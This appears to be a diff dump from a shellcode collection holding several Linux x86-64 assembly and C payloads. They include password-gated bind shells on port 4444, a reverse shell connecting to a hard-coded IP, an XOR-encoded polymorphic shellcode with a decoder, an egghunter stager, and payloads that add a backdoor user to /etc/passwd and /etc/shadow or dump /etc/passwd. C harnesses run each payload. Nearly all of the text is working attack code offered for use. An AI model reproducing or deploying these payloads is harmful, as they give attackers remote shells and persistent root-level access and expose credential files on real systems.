; Simple bind shell (listens on port 4444 by default) with 4 bytes
; password protection. Using a 4 bytes long password is still
; reasonably strong for a single-shot connection and keeps the
; code shorter.
;
; To change the port or the password just modify the values of the
; exp_port and exp_pass "variables" below.
;
; After the code gets executed connect to the newly opened port:
;
; nc <IP address> <port number>
;
; There is no password prompt. Type in the 4 bytes long password
; and hit enter. If the password matches, you are ready to type
; OS commands.
;
; ===================================================================
global _start
section .text
; -------------------------------------------------------------------
; Preprocessor directives so you can easily change the port and the
; password.
; -------------------------------------------------------------------
; Port number to listen on.
%define exp_port 0x5c11 ; 4444
; Password to use.
%define exp_pass 0x6c6c6568 ; hell
; -------------------------------------------------------------------
; DO NOT TOUCH
; preprocessor directives so syscalls can be easily referenced
; -------------------------------------------------------------------
%define sys_bind 49
%define sys_listen 50
%define sys_accept 43
%define sys_execve 59
%define sys_dup2 33
_start:
; ---------------------------------------------------------------
; START: create socket
; ---------------------------------------------------------------
xor rax, rax
push rax ; saving for sockaddr
push rax ; struct
push rax ; clear rax later
push rax ; set rdx to 0
pop rdx ; protocol
mov al, 2
push rax
push rax
pop rsi
pop rdi ; PF_INET
shr rsi, 1 ; SOCK_STREAM
add al, 39 ; socket syscall (41)
syscall
; ---------------------------------------------------------------
push rax ; store sockfd as first
pop rdi ; argument of bind
; ---------------------------------------------------------------
; START: create struct
;
; srv_addr.sin_family = AF_INET;
; srv_addr.sin_addr.s_addr = INADDR_ANY;
; srv_addr.sin_port = htons(portno);
;
; This is how it looks like on the stack (port is 4444):
;
; 0x02 0x00 0x11 0x5c 0x00 0x00 0x00 0x00
; 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
; ---------------------------------------------------------------
pop rax ; clear rax so can be
; used for syscall Nr.
mov byte [rsp], 2 ; set values
mov word [rsp+2], exp_port
push rsp
pop rsi ; addr of struct in rsi
; ---------------------------------------------------------------
; bind socket
; ---------------------------------------------------------------
push rax
pop rdx
add dl, 16 ; socklen_t addrlen
add al, sys_bind ; syscall number
syscall
; ---------------------------------------------------------------
; listen
; ---------------------------------------------------------------
; rdi should still hold the socket descriptor so we don't
; have to set it again
; We can save a 'xor rax, rax' here.
; If success, 0 is returned by bind, we will have the rax reg.
; cleared.
push 2
pop rsi
add al, sys_listen
syscall
; ---------------------------------------------------------------
; accept
; ---------------------------------------------------------------
; rdi should still hold the socket descriptor so we don't
; have to set it again
; We can save a 'xor rax, rax' here.
; If success, 0 is returned by listen, we will have the rax reg.
; cleared.
push rax
pop rdx
push rax
pop rsi
add al, sys_accept
syscall
; at this point rax contains the new socket descriptor
push rax ; save new sockfd
push rax ;
pop rdi ; first argument for
; read()
pop r15 ; save for later
; ---------------------------------------------------------------
; get passwd
;
; We will work with a 4 byte password, should be more than
; enough as no brute forcing is possible. Chances to guess
; the right value is 0. Of course passwd should not contain
; null bytes.
;
; n = read(newsockfd,buffer,4);
; ---------------------------------------------------------------
xor rax, rax ; read() is syscall Nr. 0
push rax ; buffer filled with 0s
push rsp ; setup pointer to buf
pop rsi
add rdx, 4
syscall
; compare pass received with valid pass and exit if no match
xor rcx, rcx
inc rcx
push rsp
pop rdi
push exp_pass
push rsp
pop rsi
cmpsq
jne passfail ; passwd match, give shell
shell:
; ---------------------------------------------------------------
; 6. exec shell
; ---------------------------------------------------------------
add cl, 2
mov rdi, r15
dup_loop:
push rcx ; have to save rcx as dup2
; changes it's value
xor rax, rax
sub rcx, 1
push rcx
pop rsi
add al, sys_dup2
syscall
pop rcx ; restore the counter
loop dup_loop
jmp mytext
code:
pop rdi
mov [rdi+7], BYTE al
push rax
push rax
pop rsi
pop rdx
add al, sys_execve
syscall
mytext:
call code
MyText: db '/bin/sh', 0x41
passfail:

50
shellcodes/linux_x86-64/43561.asm Normal file
View file

@ -0,0 +1,50 @@
; ===================================================================
; "Polymorphic" version of shellcode at:
; http://shell-storm.org/shellcode/files/shellcode-658.php
; Author: SLAE64-1351 (Keyman)
; Date: 21/09/2014
;
; Length: 273 bytes (got shorter by 117 bytes)
;
; The original code was optimized. This way it became 240 bytes long.
; Each byte of the optimized shellcode was XOR'ed with 0xDE. The
; result was dumped as the encoded shellcode below. A decoder stub
; was implemented to XOR each byte of "shellcode" with 0xDE. (except
; the first byte). After the decoding is finished execution is
; passed to the original (decoded) shellcode.
;
; ===================================================================
section .text
global _start
_start:
; -------------------------------------------------------------------
; Shellcode decoder stub
; -------------------------------------------------------------------
push 1
pop rcx
begin:
cmp rcx, 1
je begin_sc
pop rdi ; rdi points to the shellcode
push byte 0x78
pop rcx
add rcx, 0x77
decode:
xor byte [rdi+rcx], 0xDE
loop decode
jmp shellcode
begin_sc:
dec rcx
call begin
; -------------------------------------------------------------------
; Encoded shellcode
; -------------------------------------------------------------------
shellcode:
sc: db 0xEB, 0xBB, 0x81, 0x5E, 0xB1, 0xD5, 0x9F, 0x5E, 0xB1, 0xC6, 0x9F, 0xB4, 0xDC, 0x87, 0xB4, 0xDC, 0x86, 0x8E, 0x8E, 0x80, 0x84, 0xB8, 0x5F, 0x18, 0xD1, 0xDA, 0xB8, 0x5F, 0x1C, 0x5C, 0xDC, 0x8F, 0xD1, 0xDB, 0x87, 0x97, 0x49, 0x96, 0x5D, 0x19, 0xD3, 0x3C, 0x3D, 0x96, 0x21, 0x11, 0x89, 0x80, 0x8E, 0x81, 0xB4, 0xDC, 0x87, 0xB4, 0xF0, 0x9F, 0x80, 0xB4, 0xDF, 0x86, 0x9F, 0x88, 0x84, 0x8F, 0xD1, 0xDB, 0x87, 0x96, 0x5D, 0x18, 0xEE, 0x97, 0x59, 0x21, 0xB4, 0xE5, 0x9F, 0x80, 0x3C, 0x37, 0xB4, 0xDC, 0x87, 0xB4, 0xDD, 0x86, 0x8F, 0xD1, 0xDB, 0x87, 0x97, 0x59, 0x21, 0x3C, 0x2A, 0x96, 0xEF, 0x21, 0xB4, 0xE2, 0x86, 0xD1, 0xDB, 0x36, 0x48, 0x21, 0x21, 0x21, 0xF1, 0xBB, 0xAA, 0xBD, 0xF1, 0xAE, 0xBF, 0xAD, 0xAD, 0xA9, 0xBA, 0x9F, 0xF1, 0xF1, 0xBB, 0xAA, 0xBD, 0xF1, 0xAD, 0xB6, 0xBF, 0xBA, 0xB1, 0xA9, 0x9F, 0xAD, 0xB6, 0xBB, 0xB2, 0xB2, 0xF3, 0xAD, 0xAA, 0xB1, 0xAC, 0xB3, 0xE4, 0xA6, 0xE4, 0xEE, 0xE4, 0xEE, 0xE4, 0xAD, 0xB6, 0xBB, 0xB2, 0xB2, 0xF3, 0xAD, 0xAA, 0xB1, 0xAC, 0xB3, 0xF0, 0xB1, 0xAC, 0xB9, 0xE4, 0xF1, 0xE4, 0xF1, 0xBC, 0xB7, 0xB0, 0xF1, 0xBC, 0xBF, 0xAD, 0xB6, 0xD4, 0xAD, 0xB6, 0xAD, 0xB6, 0xBB, 0xB2, 0xB2, 0xF3, 0xAD, 0xAA, 0xB1, 0xAC, 0xB3, 0xE4, 0xFA, 0xEF, 0xFA, 0xAC, 0xBB, 0x89, 0x9B, 0xE9, 0x99, 0x93, 0xEF, 0xFA, 0xBF, 0xA6, 0xBB, 0x93, 0xB9, 0xE8, 0x92, 0x8A, 0xAD, 0xF1, 0x8E, 0xBA, 0x8D, 0xB9, 0xBD, 0x98, 0x84, 0xEE, 0x8B, 0xED, 0x93, 0xF1, 0xE4, 0xEF, 0xEA, 0xE9, 0xE9, 0xE6, 0xE4, 0xE4, 0xE4, 0xE4, 0xE4, 0xE4, 0xD4

193
shellcodes/linux_x86-64/43562.c Normal file
View file

@ -0,0 +1,193 @@
;Exam Assignment 3
;implementation of egghunter
;Default egg = "deaddead" ;
;If connected the stager check of egg , if present execute the code ;
;You can send a maximum of 255 bytes (egg + code) ;
;if no egg , shellcode exit ;
;Christophe G SLAE64 - 1337 ;
global _start
jmp short _start
_start_code :
call rsi
_start:
; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; syscall number 41
xor rdx , rdx
push rdx ; null into the stack
push byte 0x29 ; syscall number 41
pop rax
push byte 0x2 ; AF_INET
pop rdi
push byte 0x1 ; SOCK_STREAM
pop rsi
syscall
; copy socket descriptor to rdi for future use
xchg rax , rdi
; server.sin_family = AF_INET
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = INADDR_ANY
; bzero(&server.sin_zero, 8)
xor rax, rax
push rax ; bzero(&server.sin_zero, 8)
mov rbx , 0xffffffffa3eefffd ; move ip address , port 4444 , AF_INET (02) in one instruction (noted to remove null of ip address and AF_INET value)
not rbx
push rbx
push rsp ; save rsp value into the stack , needed for rsi later
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
; syscall number 49
push byte 0x31 ; (49)
pop rax
pop rsi ; retrieve value of rsp pushed into the stack before
push byte 0x10 ; (16 bytes) sockaddr_len
pop rdx
syscall
; listen(sock, MAX_CLIENTS)
; syscall number 50
push byte 0x32 ; (50)
pop rax
push byte 0x2 ;MAX_CLIENTS
pop rsi
syscall
; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
; syscall number 43
push byte 0x2b ; Accept syscall
pop rax
sub rsp, 0x10
push rsp
pop rsi ;(struct sockaddr *)&client
push byte 0x10
push rsp
pop rdx ; &sockaddr_len
syscall
; store the client socket description
mov r9, rax
; close parent
push byte 0x3
pop rax
syscall
xchg rdi , r9 ; restore client socket description to rdi
xor rsi , rsi
dup2:
push byte 0x21
pop rax ; duplicate sockets dup2 (new, old) in this case (stdin , stdout , stderr); three times loop
syscall
inc rsi
cmp rsi , 0x3 ; go in the next couple of instruction if equals
loopne dup2
xor rsi , rsi
mul rsi
xor rdi , rdi
sub spl , 0xff
mov rsi , rsp
mov dl , 0xff
syscall
Inc_rsi:
cmp dil , 0xff
jz Exit
inc rsi
inc rdi
cmp [rsi - 4] , dword 0x64616564 ; egghunter
jnz Inc_rsi
cmp [rsi - 8] , dword 0x64616564
jnz Inc_rsi
jz _start_code
Exit:
push byte 0x3c
pop rax
syscall
------------------------------------------------------------------------------------------------------------------------------------------------
Usage :
Execve Shellcode
#(echo -ne "\x68\x85\x11\x47\x02\x64\x65\x61\x64\x64\x65\x61\x64\xeb\x1d\x48\x31\xc0\x5f\x88\x67\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x8d\x77\x08\x48\x8d\x57\x10\x48\x83\xc0\x3b\x0f\x05\xe8\xde\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x42\x42\x42\x42\x43\x43\x43\x43\x43\x43\x43\x43" ; cat) | nc localhost 4444
"x68\x85\x11\x47\x02" -->> dumm bytes
"\x64\x65\x61\x64\x64\x65\x61\x64" -->> egg (deaddead)
"\xeb\x1d\x48\x31\xc0\x5f\x88\x67\x07\x48\x89\x7f\x08\x48\x89\x47\x10"
"\x48\x8d\x77\x08\x48\x8d\x57\x10\x48\x83\xc0\x3b\x0f\x05\xe8\xde\xff" -->> shellcode Execve JCP
"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x42\x42\x42"
"\x42\x43\x43\x43\x43\x43\x43\x43\x43"
---------------------------------------------------------------------------------------------------------------------------------------------------
Shellcode :
#include <stdio.h>
#include <string.h>
unsigned char stager[] = \
"\xeb\x02\xff\xd6\x48\x31\xd2\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48\x31\xc0\x50\x48\xc7\xc3\xfd\xff\xee\xa3\x48\xf7\xd3\x53\x54\x6a\x31\x58\x5e\x6a\x10\x5a\x0f\x05\x6a\x32\x58\x6a\x02\x5e\x0f\x05\x6a\x2b\x58\x48\x83\xec\x10\x54\x5e\x6a\x10\x54\x5a\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x21\x58\x0f\x05\x48\xff\xc6\x48\x83\xfe\x03\xe0\xf2\x48\x31\xf6\x48\xf7\xe6\x48\x31\xff\x40\x80\xec\xff\x48\x89\xe6\xb2\xff\x0f\x05\x40\x80\xff\xff\x74\x1e\x48\xff\xc6\x48\xff\xc7\x81\x7e\xfc\x64\x65\x61\x64\x75\xeb\x81\x7e\xf8\x64\x65\x61\x64\x75\xe2\x0f\x84\x6a\xff\xff\xff\x6a\x3c\x58\x0f\x05";
int main()
{
printf("Stager Length: %d\n", (int)strlen(stager));
(*(void (*)()) stager)();
}

108
shellcodes/linux_x86-64/43563.c Normal file
View file

@ -0,0 +1,108 @@
; shellcode name add_user_password_JCP_open,write,close
; Author : Christophe G SLAE64-1337
; Len : 358 bytes
; Language : Nasm
; "name = pwned ; pass = $pass$"
; add user and password with open,write,close
; tested kali linux , kernel 3.12
global _start
_start:
xor rax , rax
push rax
pop rsi
push rax ; null all register used for open syscall
pop rdx
add al , 0x2
mov rdi , 0x647773ffffffffff
shr rdi , 0x28
push rdi ; "/etc/passwd"
mov rdi , 0x7361702f6374652f
push rdi
mov rdi , rsp
mov si , 0x441
mov dx , 0x284
syscall ; open syscall
xor edi , edi
add dil , 0x3
jmp short findaddress ; I placed the jmp short here size of code is too lenght for jmp short if placed in head
_respawn:
pop r9
mov [r9 + 0x30] , byte 0xa ; terminate the string
lea rsi , [r9] ; "pwned:x:1001:1002:pwned,,,:/home/pwned:/bin/bash'
mov al , 0x1
xor rdx , rdx
add rdx , 0x31
syscall ; write syscall
xor edi , edi
add dil , 0x3
push rdi
pop rax
syscall ; close syscall
xor rax , rax
push rax
pop rsi
add al , 0x2
mov rdi , 0x776f64ffffffffff ; open '/etc/shadow'
shr rdi , 0x28
push rdi
mov rdi , 0x6168732f6374652f
push rdi
mov rdi , rsp
mov si , 0x441
mov dx , 0x284
syscall ; open syscall
xor rax , rax
add al , 0x1
xor edi , edi
add dil , 0x3
lea rsi , [r9 + 0x31] ; "pwned:$6$uiH7x.vhivD7LLXY$7sK1L1KW.ChqWQZow3esvpbWVXyR6LA431tOLhMoRKjPerkGbxRQxdIJO2Iamoyl7yaVKUVlQ8DMk3gcHLOOf/:16261:0:99999:7:::", 0xa
push rax
pop rdx
add dl , 0x83
syscall ; write syscall
xor edi , edi
add dil , 0x3
push rdi
pop rax
syscall
xor rax , rax
add al , 0x3c ; exit (no matter value of exit code)
syscall
findaddress:
call _respawn
string : db "pwned:x:1001:1002:pwned,,,:/home/pwned:/bin/bashApwned:$6$uiH7x.vhivD7LLXY$7sK1L1KW.ChqWQZow3esvpbWVXyR6LA431tOLhMoRKjPerkGbxRQxdIJO2Iamoyl7yaVKUVlQ8DMk3gcHLOOf/:16261:0:99999:7:::",0xa
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x48\x31\xc0\x50\x5e\x50\x5a\x04\x02\x48\xbf\xff\xff\xff\xff\xff\x73\x77\x64\x48\xc1\xef\x28\x57\x48\xbf\x2f\x65\x74\x63\x2f\x70\x61\x73\x57\x48\x89\xe7\x66\xbe\x41\x04\x66\xba\x84\x02\x0f\x05\x31\xff\x40\x80\xc7\x03\xeb\x74\x41\x59\x41\xc6\x41\x30\x0a\x49\x8d\x31\xb0\x01\x48\x31\xd2\x48\x83\xc2\x31\x0f\x05\x31\xff\x40\x80\xc7\x03\x57\x58\x0f\x05\x48\x31\xc0\x50\x5e\x04\x02\x48\xbf\xff\xff\xff\xff\xff\x64\x6f\x77\x48\xc1\xef\x28\x57\x48\xbf\x2f\x65\x74\x63\x2f\x73\x68\x61\x57\x48\x89\xe7\x66\xbe\x41\x04\x66\xba\x84\x02\x0f\x05\x48\x31\xc0\x04\x01\x31\xff\x40\x80\xc7\x03\x49\x8d\x71\x31\x50\x5a\x80\xc2\x83\x0f\x05\x31\xff\x40\x80\xc7\x03\x57\x58\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\x87\xff\xff\xff\x70\x77\x6e\x65\x64\x3a\x78\x3a\x31\x30\x30\x31\x3a\x31\x30\x30\x32\x3a\x70\x77\x6e\x65\x64\x2c\x2c\x2c\x3a\x2f\x68\x6f\x6d\x65\x2f\x70\x77\x6e\x65\x64\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x70\x77\x6e\x65\x64\x3a\x24\x36\x24\x75\x69\x48\x37\x78\x2e\x76\x68\x69\x76\x44\x37\x4c\x4c\x58\x59\x24\x37\x73\x4b\x31\x4c\x31\x4b\x57\x2e\x43\x68\x71\x57\x51\x5a\x6f\x77\x33\x65\x73\x76\x70\x62\x57\x56\x58\x79\x52\x36\x4c\x41\x34\x33\x31\x74\x4f\x4c\x68\x4d\x6f\x52\x4b\x6a\x50\x65\x72\x6b\x47\x62\x78\x52\x51\x78\x64\x49\x4a\x4f\x32\x49\x61\x6d\x6f\x79\x6c\x37\x79\x61\x56\x4b\x55\x56\x6c\x51\x38\x44\x4d\x6b\x33\x67\x63\x48\x4c\x4f\x4f\x66\x2f\x3a\x31\x36\x32\x36\x31\x3a\x30\x3a\x39\x39\x39\x39\x39\x3a\x37\x3a\x3a\x3a\x0a";
int main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
(*(void (*)()) code)();
}

45
shellcodes/linux_x86-64/43564.c Normal file
View file

@ -0,0 +1,45 @@
; shellcode name add_user_password
; Author : Christophe G SLAE64-1337
; Len : 273 bytes
; Language : Nasm
; "name = pwned ; pass = $pass$"
; add user and password with echo cmd
; tested kali linux , kernel 3.12
global _start
_start:
jmp short findaddress
_realstart:
pop rdi
xor byte [rdi + 7] , 0x41 ; replace A to null byte "/bin/shA"
xor byte [rdi + 10] ,0x41 ; same "-cA"
xor rdx , rdx
lea rdi , [rdi]
lea r9 , [rdi + 8]
lea r10 , [rdi + 11]
push rdx
push r10
push r9
push rdi
mov rsi , rsp
add al , 59
syscall
findaddress:
call _realstart
string : db "/bin/shA-cAecho pwned:x:1001:1002:pwned,,,:/home/pwned:/bin/bash >> /etc/passwd ; echo pwned:\$6\$uiH7x.vhivD7LLXY\$7sK1L1KW.ChqWQZow3esvpbWVXyR6LA431tOLhMoRKjPerkGbxRQxdIJO2Iamoyl7yaVKUVlQ8DMk3gcHLOOf/:16261:0:99999:7::: >> /etc/shadow"
unsigned char code[] = \
"\xeb\x24\x5f\x80\x77\x07\x41\x80\x77\x0a\x41\x48\x31\xd2\x48\x8d\x3f\x4c\x8d\x4f\x08\x4c\x8d\x57\x0b\x52\x41\x52\x41\x51\x57\x48\x89\xe6\x04\x3b\x0f\x05\xe8\xd7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x2d\x63\x41\x65\x63\x68\x6f\x20\x70\x77\x6e\x65\x64\x3a\x78\x3a\x31\x30\x30\x31\x3a\x31\x30\x30\x32\x3a\x70\x77\x6e\x65\x64\x2c\x2c\x2c\x3a\x2f\x68\x6f\x6d\x65\x2f\x70\x77\x6e\x65\x64\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x3b\x20\x65\x63\x68\x6f\x20\x70\x77\x6e\x65\x64\x3a\x5c\x24\x36\x5c\x24\x75\x69\x48\x37\x78\x2e\x76\x68\x69\x76\x44\x37\x4c\x4c\x58\x59\x5c\x24\x37\x73\x4b\x31\x4c\x31\x4b\x57\x2e\x43\x68\x71\x57\x51\x5a\x6f\x77\x33\x65\x73\x76\x70\x62\x57\x56\x58\x79\x52\x36\x4c\x41\x34\x33\x31\x74\x4f\x4c\x68\x4d\x6f\x52\x4b\x6a\x50\x65\x72\x6b\x47\x62\x78\x52\x51\x78\x64\x49\x4a\x4f\x32\x49\x61\x6d\x6f\x79\x6c\x37\x79\x61\x56\x4b\x55\x56\x6c\x51\x38\x44\x4d\x6b\x33\x67\x63\x48\x4c\x4f\x4f\x66\x2f\x3a\x31\x36\x32\x36\x31\x3a\x30\x3a\x39\x39\x39\x39\x39\x3a\x37\x3a\x3a\x3a\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77"
;
int main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
(*(void (*)()) code)();
}

51
shellcodes/linux_x86-64/43565.asm Normal file
View file

@ -0,0 +1,51 @@
BITS 64
; Author Mr.Un1k0d3r - RingZer0 Team
; Read /etc/passwd Linux x86_64 Shellcode
; Shellcode size 82 bytes
global _start
section .text
_start:
jmp _push_filename
_readfile:
; syscall open file
pop rdi ; pop path value
; NULL byte fix
xor byte [rdi + 11], 0x41
xor rax, rax
add al, 2
xor rsi, rsi ; set O_RDONLY flag
syscall
; syscall read file
sub sp, 0xfff
lea rsi, [rsp]
mov rdi, rax
xor rdx, rdx
mov dx, 0xfff; size to read
xor rax, rax
syscall
; syscall write to stdout
xor rdi, rdi
add dil, 1 ; set stdout fd = 1
mov rdx, rax
xor rax, rax
add al, 1
syscall
; syscall exit
xor rax, rax
add al, 60
syscall
_push_filename:
call _readfile
path: db "/etc/passwdA"
Shellcode:
\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41

148
shellcodes/linux_x86-64/43566.asm Normal file
View file

@ -0,0 +1,148 @@
;Bind_TCP 4444 with password ;
;Default password = Password ;
;If connected the shellcode no prompt for password ;
;Enter password directly and you get the bin/sh shell;
;if password is wrong the shellcode exit: ;
;Christophe G SLAE64 - 1337 size 173 bytes ;
global _start
_start:
; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; syscall number 41
push 0x29
pop rax
push 0x2
pop rdi
push 0x1
pop rsi
xchg rbx , rdx
syscall
; copy socket descriptor to rdi for future use
xchg rax , rdi
; server.sin_family = AF_INET
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = INADDR_ANY
; bzero(&server.sin_zero, 8)
xor rax, rax
mov dword [rsp - 4] , eax
mov word [rsp - 6] ,0x5c11
mov byte [rsp - 8] , 0x2
sub rsp , 8
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
; syscall number 49
push 0x31
pop rax
mov rsi, rsp
push 0x10
pop rdx
syscall
; listen(sock, MAX_CLIENTS)
; syscall number 50
push 0x32
pop rax
push 0x2
pop rsi
syscall
; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
; syscall number 43
push 0x2b
pop rax
sub rsp, 0x10
mov rsi, rsp
push 0x10
mov rdx, rsp
syscall
; store the client socket description
mov r9, rax
; close parent
push 0x3
pop rax
syscall
xchg rdi , r9
xor rsi , rsi
dup2:
push 0x21
pop rax
syscall
inc rsi
cmp rsi , 0x2
loopne dup2
CheckPass:
xor rax , rax
push 0x10
pop rdx
sub rsp , 16 ; 16 bytes to receive user input
mov rsi , rsp
xor edi , edi
syscall ; system read function call
mov rax , 0x64726f7773736150 ; "Password"
lea rdi , [rel rsi]
scasq
jz Execve
push 0x3c
pop rax
syscall
Execve:
xor rax , rax
mov rdx , rax
push rax
mov rbx, 0x68732f2f6e69622f
push rbx
; store /bin//sh address in RDI
mov rdi, rsp
; Second NULL push
push rax
; Push address of /bin//sh
push rdi
; set RSI
mov rsi, rsp
; Call the Execve syscall
push 0x3b
pop rax
syscall

107
shellcodes/linux_x86-64/43568.asm Normal file
View file

@ -0,0 +1,107 @@
/*
; Author Andriy Brukhovetskyy - doomedraven - SLAEx64 1322
; 138 bytes
global _start
section .text
_start:
;socket syscall
push byte 0x29 ; 41 socket
pop rax
push byte 0x2 ; AF_INET
pop rdi
push byte 0x1 ; SOCK_STREAM
pop rsi
cdq ;rdx = 0 - ANY
syscall
xchg rdi, rax ; save socket descriptor
mov dword [rsp-4], 0x0901a8c0 ; ip
mov word [rsp-6], 0x5c11 ; port 4444
mov byte [rsp-8], 0x02
sub rsp, 8
push byte 0x2a ; connect
pop rax
mov rsi, rsp ; pointer
push byte 0x10 ; len
pop rdx
syscall
push byte 0x3; counter
pop rsi
dup2_loop:
dec rsi
push byte 0x21
pop rax
syscall
jnz dup2_loop ; jump if not 0
;read buffer
mov rdi, rax ; socket
;xor rax, rax
cdq
mov byte [rsp-1], al ;0 read
sub rsp, 1
push rdx
lea rsi, [rsp-0x10] ; 16 bytes from buf
add dl, 0x10 ; size_t count
syscall
;test passcode
mov rax, 0x617264656d6f6f64 ; passcode 'doomedra'[::-1].encode('hex')
push rdi ; save the socket
lea rdi, [rsi] ; load string from address
scasq ; compare
jz accepted_passwd ; jump if equal
;exit if different :P
push byte 0x3c
pop rax
syscall
accepted_passwd:
;execve
pop rdi; socket
xor rax, rax
mov rbx, 0x68732f2f6e69622f ;/bin//sh in reverse
push rbx
mov rdi, rsp
push rax
mov rdx, rsp
push rdi
mov rsi, rsp
add al, 0x3b
syscall
*/
#include <stdio.h>
#include <string.h>
// 138 bytes
unsigned char code[] =\
"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05"
"\x48\x97\xc7\x44\x24\xfc"
"\xc0\xa8\x01\x09\x66\xc7\x44\x24\xfa"
"\x11\x5c" //port big endiant
"\xc6\x44\x24\xf8\x02\x48\x83"
"\xec\x08\x6a\x2a\x58\x48\x89\xe6\x6a\x10\x5a\x0f"
"\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05"
"\x75\xf6\x48\x89\xc7\x99\x88\x44\x24\xff\x48\x83"
"\xec\x01\x52\x48\x8d\x74\x24\xf0\x80\xc2\x10\x0f"
"\x05\x48\xb8\x64\x6f\x6f\x6d\x65\x64\x72\x61\x57"
"\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05"
"\x5f\x48\x31\xc0\x48\xbb\x2f\x62\x69\x6e\x2f\x2f"
"\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48"
"\x89\xe6\x04\x3b\x0f\x05";
main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

134
shellcodes/linux_x86-64/43570.asm Normal file
View file

@ -0,0 +1,134 @@
/*
;Author - Andriy Brukhovetskyy - doomedraven - SLAEx64 - 1322
;175 bytes
;http://www.doomedraven.com/2014/05/slaex64-shellbindtcp-with-passcode.html
global _start
section .text
_start:
push byte 0x29 ; 41 - socket syscall
pop rax
push byte 0x02 ; AF_INET
pop rdi
push byte 0x01 ; SOCK_STREAM
pop rsi
cdq
syscall
;copy socket descriptor to rdi for future use
;bind
xchg rdi, rax
xor rax, rax
mov dword [rsp-4], eax ;INADDR_ANY
mov word [rsp-6], 0x5c11 ;PORT 4444
mov byte [rsp-8], 0x2 ;AF_INET
sub rsp, 0x8
push byte 0x31 ;49 bind
pop rax
mov rsi, rsp
cdq
add dl, 16 ;len
syscall
;listen
push byte 0x32 ;listen
pop rax
;push byte 0x02 ;max clients
;pop rsi
syscall
push byte 0x2b ; accept
pop rax
sub rsp, 0x10 ; adjust
xor rsi, rsi
mov rsi, rsp ; pointer
mov byte [rsp-1], 0x10 ;len
sub rsp, 0x01 ; adjust
cdq
mov rdx, rsp ; pointer
syscall
;read buffer
mov rdi, rax ; socket
xor rax, rax
mov byte [rsp-1], al ;0 read
sub rsp, 1
cdq
push rdx ; 0 stdin
lea rsi, [rsp-0x10] ; 16 bytes from buffer
add dl, 0x10 ; len
syscall
;test passcode
mov rax, 0x617264656d6f6f64 ; passcode 'doomedra'[::-1].encode('hex')
push rdi ; save the socket
lea rdi, [rsi] ; load string from address
scasq ; compare
jz accepted_passwd ; jump if equal
;exit if different :P
xor rax, rax
add al, 60
syscall
accepted_passwd:
pop rdi; socket
push byte 0x03
pop rsi
dup2_loop:
dec rsi
push byte 0x21
pop rax
syscall
jnz dup2_loop ; jump if not 0
push rsi; 0
;execve
;push /bin//sh in reverse
mov rbx, 0x68732f2f6e69622f
push rbx
mov rdi, rsp
push rsi
mov rdx, rsp
push rdi
mov rsi, rsp
push byte 0x3b
pop rax
syscall
*/
#include <stdio.h>
#include <string.h>
// 175 bytes
unsigned char code[] =\
"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05"
"\x48\x97\x48\x31\xc0\x89\x44\x24\xfc\x66\xc7\x44"
"\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec"
"\x08\x6a\x31\x58\x48\x89\xe6\x99\x80\xc2\x10\x0f"
"\x05\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x48\x83\xec"
"\x10\x48\x31\xf6\x48\x89\xe6\xc6\x44\x24\xff\x10"
"\x48\x83\xec\x01\x99\x48\x89\xe2\x0f\x05\x48\x89"
"\xc7\x48\x31\xc0\x88\x44\x24\xff\x48\x83\xec\x01"
"\x99\x52\x48\x8d\x74\x24\xf0\x80\xc2\x10\x0f\x05"
"\x48\xb8\x64\x6f\x6f\x6d\x65\x64\x72\x61\x57\x48"
"\x8d\x3e\x48\xaf\x74\x07\x48\x31\xc0\x04\x3c\x0f"
"\x05\x5f\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f"
"\x05\x75\xf6\x56\x48\xbb\x2f\x62\x69\x6e\x2f\x2f"
"\x73\x68\x53\x48\x89\xe7\x56\x48\x89\xe2\x57\x48"
"\x89\xe6\x6a\x3b\x58\x0f\x05";
main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

77
